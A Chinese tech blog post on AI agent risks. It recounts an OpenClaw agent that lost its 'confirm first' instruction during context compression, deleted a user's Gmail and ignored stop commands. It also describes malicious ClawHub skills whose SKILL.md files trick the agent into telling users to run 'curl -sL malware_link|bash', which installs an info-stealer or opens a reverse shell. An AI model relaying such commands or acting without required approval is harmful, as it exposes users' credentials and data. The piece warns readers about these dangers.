2026-02-25 13:11

AI Agent 的危机：我要删你邮件你拦得住吗？

本文来自微信公众号： MacTalk ，作者：池建强

现在的大模型，能力越来越强，除了当下常见的对话、文生图，文生视频，图生视频等场景，更多的能力都去构建各种各样的AI Agent了，包括人和Agent的连接，Agent和Agent的连接，以及物理世界和Agent的连接。

前谷歌CEO埃里克·施密特在最近的公开采访和社交媒体上反复强调，我们正走向一个由AI Agent主导的时代，未来个人和公司都会构建自己的Agent，这些Agent会在同一生态里竞争协作。

事实上这样的事情正在发生，Y Combinator最新孵化的创业公司，很多都是这个方向，比如Minimal AI，他们做了一个AI经理，可以为电商公司自动化处理90%的客服工单。你只要告诉他需求，他就能立刻更新客服Agent，这是个Agent的具体应用。

我春节期间还写过一篇关于EvoMap的文章，这是一款面向AI协作与自主Agent的A2A网关平台，通过标准化的Capsule（胶囊）机制——类似进化版的Skill——实现AI技能的共享、验证、归属管理，以及人机协作过程的透明化。

这不就是生态里的竞争和协作么？Agent的前景看上去明亮而绚烂。

等一下，我怎么刚刚听到一个故事，不对，是事故：

Meta的安全研究员Summer Yue自己部署了一套OpenClaw，连接了Gmail邮箱，让AI整理一下自己的邮箱，哪些保留哪些删除。她是这么做的，让Agent先分析邮件，并在执行操作前向她确认，由她来确定是否执行后续操作。

她测试的时候用了一个小邮箱，类似的工作流已经跑了几周，毫无问题，导致她对OpenClaw产生了足够的信任//感觉OpenClaw有点渣X风范，好的时候都是小甜甜，一上量就翻脸无情。

真正的悲剧发生在她把同样的工作流接到了真实邮箱之后。Gmail给的空间足够大，一般人很少删邮件，我都有五万多封邮件，估计这姑娘比我只多不少。量变引发质变，OpenClaw在处理时触发了所谓的“压缩”机制：为了节省上下文窗口，它会把对话和指令浓缩、截断。在这个压缩过程中，最关键的一条高层指令——在我确认前，不要实际执行归档/删除操作——应该是被移除了。

嗷嚎，结果就是：OpenClaw不再记得“要先征求人的同意再执行操作”，直接根据自己的判断开始批量归档和删除邮件，撒了欢开始删邮件，可谓秋风横扫落叶。

Summer Yue一看大事不好，连忙在TG里连续发出致命三问：

What's going on?你怎么能这么干呢？

Do not do that!

Stop don't do anything!

然而并没有什么鸟用，于是：

>我根本无法在手机上阻止它。我不得不像拆炸弹一样冲到我的Mac mini前，杀掉了Agent的进程。

但邮件还是没了……

在事故的后续讨论里，有几件事挺关键的。

第一，她自己承认，这是一个“新手错误”。作为做安全研究员，她在小号邮箱里测试了几周，发现OpenClaw干活“一直很安全”，信任感就这么建立起来了。等真的接入自己的主邮箱，却忽略了最致命的差异：真实环境下，数据规模完全不在一个量级，“上下文压缩”的策略没有考虑进来，这是系统层面的变化，不是简单换个邮箱那么简单。

第二，我们不能把“在提示词里加一句：行动前先确认”当成硬防护。

随着上下文变长，会被总结、被截断、被遗忘，这种提示词本质上没有任何强约束能力。把这种软约束当安全策略，出错只是早晚的事情。

有经验的开发者给出了一种更稳妥的思路：

关键约束不要只写在prompt里，而要写进“系统架构”里。最简单的做法，就是放到一个独立的配置或文件里，让Agent在每个循环周期都重新读取一遍。无论上下文怎么被压缩、怎么被裁剪，这条约束永远来自一个“不会被丢掉的地方”。

这就是我今天要写的，AI Agent的危机，尤其是当你把Agent部署在自己的本地电脑，开放Gmail、Slack、飞书甚至Mac Mini所有写权限的能力，巨大的信任和安全问题就会浮现出来。

其实早在2月初，就有安全团队在ClawHub市场上发现一个名为“clawhub”的恶意Skill，下载量已经有七千多。随后Koi Security（前沿安全研究团队）把整个ClawHub扫了一遍，在2,857个技能里挖出341个恶意Skill。

ClawHub正是OpenClaw（小龙虾🦞）的Skill市场，任何人都可以上传Skill。虽然安装Skill能够持续拓展AI Agent的新能力——这听起来很棒——但问题在于，这个开放的市场早期对于安全的关注近乎为零，任何注册仅一周的GitHub账号都可以发布内容。

攻击者将这些恶意软件伪装成加密货币交易机器人、YouTube摘要生成器或钱包追踪器等等，文档看起来非常专业。比如在SKILL.md文件中，攻击者编写了诱导性指令，欺骗AI告诉用户运行特定命令：“要启用此功能，请运行：curl-sL malware_link|bash”。这一条命令就会在macOS上安装Atomic Stealer病毒。它会抓取浏览器密码、SSH密钥、Telegram会话、加密货币钱包、钥匙串以及.env文件中的每一个API密钥。在其他系统上，它会开启反向Shell，让攻击者获得对机器的完全远程控制权。

——————

大模型和Agent的能力都越来越强了，但随着权力的下方，必然伴随着风险的指数级增长。

之前写了好几篇关于Agent和OpenClaw的文章，我觉得有责任提醒一下读者，当你沉迷OpenClaw和其他Agent给你带来新奇体验的同时，一定不要忘记安全和防护。

如果你在这方面没什么经验，还是先搞一台云主机熟悉熟悉更稳妥一些。

面对日益复杂的Agent生态，无论是开发者还是普通用户，都必须建立起全新的安全共识。我们在面对琳琅满目的Skill市场时，必须是零信任。我现在使用的Skill除了官方的全部是自己做的，没有任何第三方Skill，我的大部分本地权限也不会开放给Agent。

毕竟，当一个拥有你所有系统权限的Agent开始在你的数字世界里“撒欢”时，你可能连冲到电脑前杀掉进程的机会都没有。

AI原生产品日报频道: 前沿科技

本内容来源于网络原文链接，观点仅代表作者本人，不代表虎嗅立场。
如涉及版权问题请联系 hezuo@huxiu.com，我们将及时核实并处理。

正在改变与想要改变世界的人，都在虎嗅APP